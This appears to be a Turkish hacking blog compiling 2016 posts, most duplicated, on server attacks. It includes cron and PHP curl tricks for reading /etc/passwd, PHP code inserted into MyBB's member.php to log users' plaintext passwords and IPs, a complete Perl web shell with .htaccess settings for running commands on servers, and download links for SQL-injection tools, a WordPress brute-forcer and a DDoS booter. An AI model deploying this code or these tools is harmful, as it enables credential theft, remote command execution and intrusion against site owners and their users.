cloud flare videolu bypass
0
Cron Jobs Server Bypass Method
22 Eylül 2016 Perşembe
Evet dostlar, cron jobs cpanel yazılımıdır. Zamanlanmış görev anlamını taşır. Bu methodu deniyebilmemiz için hedef sitenin cpanel yazılımını kullanması gerekir ve cpanel bilgilerini bilmeniz gerekir.
cPanele giriş yaptıktan sonra Advanced(Gelişmiş) bölümünden Cron Jobs’a geliyoruz
Common Settings: Bölümünü Every minute yapıyoruz.
Command bölümüne
cat /etc/passwd > s4.txt yazıyoruz. Ve "Add New Cron Job" Tıklıyoruz.
İşlemimiz aslında bu kadar s4.txt dosyası /home/kullanıcıadı bölümüne gitti. s4.txt dosyasının içeriğine bakarsanız passwd ’ yi rahatlıkla görebilirsiniz
cPanele giriş yaptıktan sonra Advanced(Gelişmiş) bölümünden Cron Jobs’a geliyoruz
Common Settings: Bölümünü Every minute yapıyoruz.
Command bölümüne
cat /etc/passwd > s4.txt yazıyoruz. Ve "Add New Cron Job" Tıklıyoruz.
İşlemimiz aslında bu kadar s4.txt dosyası /home/kullanıcıadı bölümüne gitti. s4.txt dosyasının içeriğine bakarsanız passwd ’ yi rahatlıkla görebilirsiniz
0
CloudLinux Bypass Mail Method
Video ingilizcedir iyice kavradıgınızda çok kullanışlıdır çoğu serverde işler.
0
mkDIR(“file:”);chdir(“file:”);mkDIR(“etc”);chdir(“etc”);mkDIR(“passwd”);chdir(“..”);chdir(“..”);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “file:file:///etc/passwd”);curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);mkDIR(“file:”);chdir(“file:”);mkDIR(“etc”);chdir(“etc”);mkDIR(“passwd”);chdir(“..”);chdir(“..”);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “file:file:///etc/passwd”);curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
Php Eval Code İle Server Bypass.
mkDIR(“file:”);chdir(“file:”);mkDIR(“etc”);chdir(“etc”);mkDIR(“passwd”);chdir(“..”);chdir(“..”);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “file:file:///etc/passwd”);curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);mkDIR(“file:”);chdir(“file:”);mkDIR(“etc”);chdir(“etc”);mkDIR(“passwd”);chdir(“..”);chdir(“..”);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “file:file:///etc/passwd”);curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
0
samuel projecktin yazdığı scripttir kullanımı kolaydır.
https://github.com/samuelproject/BruteWP
Wordpress python brute scripti
samuel projecktin yazdığı scripttir kullanımı kolaydır.
https://github.com/samuelproject/BruteWP
1
Windows'a SqlMap Kurulumu
20 Eylül 2016 Salı
size linklerini verdiğim dosyalarını indirin öncelikle
python 2.7 adlı setup u açıp Python kuruyoruz
sqlmap adlı dosyayı Yerel Disk C'ye Atıyoruz c:\ dizinine atıyoruz.
daha sonra başlat çalıştır cmd giriyoruz ve c:\ dizinine iniyoruz yani
cd..
cd..
C:\> Girdik daha sonra
cd sqlmap komutu ile sqlmap a geçiş yapıyoruz
bir başka makaledeyse sqlmap kullanımını anlatacağım
http://sqlmap.org/
https://www.python.org/download/releases/2.7/
0
Havij 1.152 Pro
buyrun sizlere havij 1.152 güvenle indirebilirsiniz havij windows üzerine yapılmış en iyi sql injecktion toolstur. içerisinde md5 cracker ve admin panel bulucuda yer alır.
http://www.mediafire.com/download/zd3r1agdu78e5l4/Havij+1.152+Pro.rar
http://www.mediafire.com/download/zd3r1agdu78e5l4/Havij+1.152+Pro.rar
0
arkadaşlar member.php yi açıp php satırının altına
kodları ekliyoruz
$kadi = $_POST['username'];
$sifresi = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen('bighatz/bh.html', 'a');
$yaz ="<font color='green'>Kulanici Adi :</font><font color='red'> $kadi</font><br>
<font color='green'>Sifresi :</font><font color='red'> $sifresi</font><br>
<font color='green'>Ip Adresi :</font><font color='red'> $ip</font><br><hr>";
fwrite($file,$yaz);
fclose($file);
daha sonra public_html de bighatz diye klasör açıp içerisine bh.html koyuyoruz ve tüm girişleri buraya yazıyor bighatz klasörünü dizin şifreleyiciyle şifrelemeniz önemlidir.
MyBB Foruma şifre log'u kurma
arkadaşlar member.php yi açıp php satırının altına
kodları ekliyoruz
$kadi = $_POST['username'];
$sifresi = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen('bighatz/bh.html', 'a');
$yaz ="<font color='green'>Kulanici Adi :</font><font color='red'> $kadi</font><br>
<font color='green'>Sifresi :</font><font color='red'> $sifresi</font><br>
<font color='green'>Ip Adresi :</font><font color='red'> $ip</font><br><hr>";
fwrite($file,$yaz);
fclose($file);
daha sonra public_html de bighatz diye klasör açıp içerisine bh.html koyuyoruz ve tüm girişleri buraya yazıyor bighatz klasörünü dizin şifreleyiciyle şifrelemeniz önemlidir.
0
Safe sql Tarayıcı SafeWVS 3.0
web sitelerinde sql xss açıklarını çok iyi tarayan bi programdır.
http://www.mediafire.com/download/5zuc7jyp023b073/safe+sql.rar
http://www.mediafire.com/download/5zuc7jyp023b073/safe+sql.rar
0
Kerinci tools 0.7
Kerinci Tools Özelikleri
-Web Scanner
-SQL Injector
-Web Explorer
-URL Fuzzer
-Hash Cracker
-TCP Connect
-N Map
-CMD Shell
-Pastebin
-Decoder
https://yadi.sk/d/wimTdJIVfc87B
-Web Scanner
-SQL Injector
-Web Explorer
-URL Fuzzer
-Hash Cracker
-TCP Connect
-N Map
-CMD Shell
-Pastebin
-Decoder
https://yadi.sk/d/wimTdJIVfc87B
0
cmd.pl çalıştırmak güvenlikli sunucuda
öncelikle bigh diye bi klasör oluşturuyoruz ve içinde .htaccesimizi atıyoruz daha sonra prix i yükleyip txt cmd shelli yüklüyoruz ve shell dizinini kendimize göre editliyoruz ve girdigimizde işlem tamam.
shell kodları
#!/home/bighatz/public_html/bighatz/prix -s
#
# PerlKit-0.1 - http://www.t0s.org
#
# cmd.pl: Run commands on a webserver
use strict;
my ($cmd, %FORM);
$|=1;
print "Content-Type: text/html\r\n";
print "\r\n";
# Get parameters
%FORM = parse_parameters($ENV{'QUERY_STRING'});
if(defined $FORM{'cmd'}) {
$cmd = $FORM{'cmd'};
}
print '<HTML>
<body>
<form action="" method="GET">
<input type="text" name="cmd" size=45 value="' . $cmd . '">
<input type="submit" value="Run">
</form>
<pre>';
if(defined $FORM{'cmd'}) {
print "Results of '$cmd' execution:\n\n";
print "-"x80;
print "\n";
open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
while(<CMD>) {
print;
}
close(CMD);
print "-"x80;
print "\n";
}
print "</pre>";
sub parse_parameters ($) {
my %ret;
my $input = shift;
foreach my $pair (split('&', $input)) {
my ($var, $value) = split('=', $pair, 2);
if($var) {
$value =~ s/\+/ /g ;
$value =~ s/%(..)/pack('c',hex($1))/eg;
$ret{$var} = $value;
}
}
return %ret;
}
.htaccess kodları
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .txt
AddHandler cgi-script .pl
AddHandler cgi-script .pl
prix indirme linki : ttps://drive.google.com/open?id=0ByCV0B0bUdJucUJpeU5ybUg3VUE
shell kodları
#!/home/bighatz/public_html/bighatz/prix -s
#
# PerlKit-0.1 - http://www.t0s.org
#
# cmd.pl: Run commands on a webserver
use strict;
my ($cmd, %FORM);
$|=1;
print "Content-Type: text/html\r\n";
print "\r\n";
# Get parameters
%FORM = parse_parameters($ENV{'QUERY_STRING'});
if(defined $FORM{'cmd'}) {
$cmd = $FORM{'cmd'};
}
print '<HTML>
<body>
<form action="" method="GET">
<input type="text" name="cmd" size=45 value="' . $cmd . '">
<input type="submit" value="Run">
</form>
<pre>';
if(defined $FORM{'cmd'}) {
print "Results of '$cmd' execution:\n\n";
print "-"x80;
print "\n";
open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
while(<CMD>) {
print;
}
close(CMD);
print "-"x80;
print "\n";
}
print "</pre>";
sub parse_parameters ($) {
my %ret;
my $input = shift;
foreach my $pair (split('&', $input)) {
my ($var, $value) = split('=', $pair, 2);
if($var) {
$value =~ s/\+/ /g ;
$value =~ s/%(..)/pack('c',hex($1))/eg;
$ret{$var} = $value;
}
}
return %ret;
}
.htaccess kodları
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .txt
AddHandler cgi-script .pl
AddHandler cgi-script .pl
prix indirme linki : ttps://drive.google.com/open?id=0ByCV0B0bUdJucUJpeU5ybUg3VUE
0
php booter shell
19 Eylül 2016 Pazartesi
meraba gençler bugün sizlere beinm çoook aradıgım ve sonunda buldugum booter ı paylaşcam çok aradım osnudna buldum %100 çalışıyo ne kadar çok site eklerseniz o kadar iyi vuruyo
https://github.com/shahril96/PHP-Shell-B...master.zip
kurulum anlatım (ingilizce ama zor deyil)
https://github.com/shahril96/PHP-Shell-B...master.zip
kurulum anlatım (ingilizce ama zor deyil)
0
MyBB Güvenlik Priv
/global.php dosyasında bul:
require_once $working_dir.-/inc/init.php’;
Yeni İnit adı ile değiştir
require_once $working_dir.-/inc/yeni dosya ismi.php’;
/css.php dosyasında bul:
require_once -./inc/init.php”;
Yeni İnit adı ile değiştir
require_once -./inc/yeni dosya ismi.php”;
/archive/global.php dosyasında bul:
require_once dirname(dirname(__FILE__)).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(dirname(__FILE__)).-/inc/yeni dosyaismi.php”;
/admin/index.php dosyasında bul:
require_once dirname(dirname(__FILE__)).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(dirname(__FILE__)).-/inc/yeni dosyaismi.php”;
işlemleri yaptıktan sonra fake /init.php ve config.php koymayı unutmayın eleman uğraşıp dursun
bu arada yeni yaptıgımız init.php ve configin chmod larını 444 yapıyoruz işlem tamamdır artık kolay kolay swden siteye geçiş sağlanmaz.
Alıntı Yapmak Yasaktır
/xmlhttp.php dosyasında bul:
require_once dirname(__FILE__).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(__FILE__).-/inc/yeni dosya ismi.php”;
/task.php dosyasında bul:
require_once dirname(__FILE__).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(__FILE__).-/inc/yeni dosya ismi.php”;
/global.php dosyasında bul:
/global.php dosyasında bul:
require_once $working_dir.-/inc/init.php’;
Yeni İnit adı ile değiştir
require_once $working_dir.-/inc/yeni dosya ismi.php’;
/css.php dosyasında bul:
require_once -./inc/init.php”;
Yeni İnit adı ile değiştir
require_once -./inc/yeni dosya ismi.php”;
/archive/global.php dosyasında bul:
require_once dirname(dirname(__FILE__)).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(dirname(__FILE__)).-/inc/yeni dosyaismi.php”;
/admin/index.php dosyasında bul:
require_once dirname(dirname(__FILE__)).-/inc/init.php”;
Yeni İnit adı ile değiştir
require_once dirname(dirname(__FILE__)).-/inc/yeni dosyaismi.php”;
işlemleri yaptıktan sonra fake /init.php ve config.php koymayı unutmayın eleman uğraşıp dursun
bu arada yeni yaptıgımız init.php ve configin chmod larını 444 yapıyoruz işlem tamamdır artık kolay kolay swden siteye geçiş sağlanmaz.
Alıntı Yapmak Yasaktır
Kaydol:
Kayıtlar (Atom)